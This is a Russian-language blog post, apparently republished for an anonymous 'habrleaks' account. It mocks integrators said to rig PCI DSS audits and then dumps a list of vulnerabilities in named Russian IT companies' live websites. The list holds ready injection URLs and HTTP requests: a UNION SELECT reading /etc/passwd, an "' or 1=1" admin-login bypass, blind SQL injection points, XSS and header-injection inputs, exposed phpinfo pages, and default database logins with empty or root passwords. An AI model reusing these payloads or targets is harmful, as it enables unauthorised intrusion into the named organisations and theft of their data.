Бумажные специалисты. Часть 2

Публикую пост по просьбе habrleaks Далее оригинальный текст

Продолжая мысль про «бумажных специалистов» обсуждаемую на хабре: http://habrahabr.ru/post/169491/
Вот вам пример таких бумажных спецов. Сейчас некоторые интеграторы и аудиторские компании договариваются с банками о заведомо успешной сертификации в рамках PCI DSS. А именно, о том что сертификации будет подвергаться не вся сеть банка, а только несколько ipшников платежного сегмента… После такого сотрудничества, потом выясняются такие моменты, что в комментариях к пользователям AD хрянятся их пароли) Чего достаточно для авторизации в самом платежном сегменте. =)

На каждом ресурсе много уязвимостей, это лишь часть из них…

ЗЫ: Поделитесь инвайтом на хабр habrleaks@mail.ru 😀

Утечка багов и оригинальная паста тут
http://pastebin.com/Y3Dkeuzv

Список багов под катом

csbigroup.ru /search/?search_query=%00
3306/tcp MySQL «root;»
— kami.ru/!go?ln=l[100045].html&c$=200595XSS%40.com&d$=Промо%2Dакции
— digdes.ru/training/register/?id=ms10748XSS%40.com
— ics.perm.ru FTP bounce
— z-it.ru/about/novosti-kompanii/company/13.01.2011?searched=%D0%BF%D0%BE%D0%B8%D1%81%D0%BA&advsearch=oneword&highlight=ajaxSearch%5Fhighlight%2BajaxSearch%5Fhighlight1
The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and ‘-,’ in /var/www/manager/includes/config.inc.php on line 60
— ussc.ru/phpinfo.php

— ascon.ru/
POST /subscribe/?act=subs HTTP/1.1
Host: ascon.ru
lastname=XSS%40.com&firstname=1&middlename=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com

— galex.ru
BlindSQLInjection
www.galex.ru/about/news.php?id1=[SQL]
www.galex.ru/search/?PHPSESSID=948cffbf1d1f118f0d2edb64a2f81978&query=XSS%40.com
— avicomp.ru/phpinfo.php
/cgi-bin/printenv
— naumen.ru/clients?filter=s_9999) union select 1,2,3,4,5,LOAD_FILE(‘/etc/passwd’),7,8,9,10,11,12,13,14,15,16,17,18,19,20 — s&show_comments=1
www.naumen.ru/tests/

— www.asbc.ru
HTTP Spliting
— hostco.ru/viewImage.htm?pic=XSS%40.com
— BlindSQLInjection
itrealty.ru/about.php?RubricID=[SQL]
www.itrealty.ru/adm/pic.php?PicID=288%2D1%20and%201%3D1
itrealty.ru/t.php
www.itrealty.ru/news.php?page=XSS%40.com
— cbs.ru
POST /site/faq/?section=9476 HTTP/1.1
Host: www.cbs.ru
ref=Вопросы%20и%20ответы&feedback_name=1&feedback_email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&feedback_tel=1&feedback_captcha1=1&enc_captcha=d95824e0942acae54839c042675d230883effe9b&feedback_submit=Отправить&feedback_message=XSS%40.com

www.cbs.ru/site/news/?vendor=all‘&page=1
— SQLInjection
POST /admin_sr/admin_login.php HTTP/1.1
Host: www.saprun.com
adminLog=’&adminpasswordec=1
Логин: «’ or 1=1 — s»
— www.lanit.ru
www.lanit.ru/projects/index.php?PAGEN_1=2&GROUP=0&BUSINESS=0&REGION=0&q=‘
from b_iblock_element where name like »%’ and active = ‘Y’ and iblock_id = 8[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘%’ and active = ‘Y’ and iblock_id = 8′ at line 1]

— www.technoserv.com
www.technoserv.com/about/company/press/news/?PAGEN_1=2XSS%40.com
— www.croc.ru/search/?s=1&q=1XSS%40.com

— POST /choosevac.asp HTTP/1.1
Host: www.ibs.ru
choose1=/content/rus/628/6283%2Darticle.aspXSS%40.com

— 1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=[SQL]
1c.ru/search/search.cgi?wm=wrdXSS%40.com&wf=2221&GroupBySite=no&ul=http%3A//www.1c.ru&q=1&cmd=Поиск

— www.compulink.ru
POST /feedback/
FIO=1&EMAIL=XSS%40.com&COMPANY=1&send_feedback=qwe&COMMENT=1

GET /redirect.php?url=%0D%0AHeader%3A%20Value&1 HTTP/1.0
Warning: Header may not contain more than a single header, new line detected in /home/u289824/compulink.ru/www/redirect.php on line 46
— www.asteros.ru/webmail/
— www.i-teco.ru/news-arh.php?id=785’ union select 1,2,3 limit 1,1 –- s
SQL база данных: sql.php “admin;<пусто>”

— www.avirsa.ru
POST /ru/subscribe HTTP/1.1
Host: avirsa.ru
email=Введите%20ваш%20e%2Dmail%20XSS%40.com

— GET /kownjfxq.htm HTTP/1.1
Host: www.epam-group.ru
Referer: kmmmi.com

www.epam.com/download.html?downloadParam=/content/dam/epam/library/analysts/CMSXSS%40Filename: /usr/local/apache22/vhosts/newsite/htdocs/modules/education/controllers/education.php — avicon.ru/com.php?id_grp=0XSS%40.com&id_com=0
— intertech.ru/News/body.asp?filename=20120726122915.xml
Загрузка D:\InetPub\wwwroot\News\20120726122915.xml’Error: System error: -2146697210.

www.intertech.ru/News/body.asp?filename=20120726122915.xmlXSS%40.com

— vimcom.ru
POST /search/ HTTP/1.1
Host: www.vimcom.ru
words=я%20ищу…&set=1&pole=XSS%40.com&cat=0
— rdtex.ru/server-status

— SQLInjeСon insert cookies
korusconsulting.ru
GET /press-room/activities/reg/?eventID=150 HTTP/1.1
Host: korusconsulting.ru
Cookie: sid=150′; CookieID=150′;

POST /press-room/research/ HTTP/1.1
Host: korusconsulting.ru
sendid=1&answer[50][]=199&answer[50][0]=0&answer[51][0]=207&answer[52][0]=211&other[50]=XSS%40.com&other[57]=1&Comments=1

GET /about/contacts/ HTTP/1.1
Host: korusconsulting.ru
Cookie: sid=%00; CookieID=%00;
session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and ‘-,’ in /home/www/z166658/htdocs/korusconsulting.ru/netcat/index.php(13): eval()’d code on line 26
korusconsulting.ru/cgi-bin/php.ini
korusconsulting.ru/phpinfo.php
— parus.ru
POST /company/job/ HTTP/1.1
Host: parus.ru
fio=XSS%40.com&dob=1&family=1&living_city=1&phone=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&cptcode=1&education=1&courses=1&experience=1&personal=1&position=0

— galaktika.ru
POST /skachat?category=99&sortby=title HTTP/1.1
Host: www.galaktika.ru
dlsearch=XSS%40.com&page_id=190
— aladdin-rd.ru/company/pressroom/events/?view=archive&PAGEN_1=2XSS%40.com
PHPInfo aladdin-rd.ru:443\a.php
— BlindSQLInjection
fortdialog.ru/projects/?Branch=[SQL]
GET /about/ HTTP/1.1
Host: fortdialog.ru
Cookie: sid=%00; QUICK_BAR_CLOSED=%00; CookieID=%00;
— itsirius.ru /modules/mod_maximenu_CK/themes/default/css/maximenuH_CK.php?monid=maximenuCKXSS%40.com
— hetnet.ru/phpmyadmin/ “Admin;<пусто>”
www.hetnet.ru/contacts/search/?search=поискXSS%40.com
— parma-telecom.ru/conference/details.php?ID=430XSS%40.com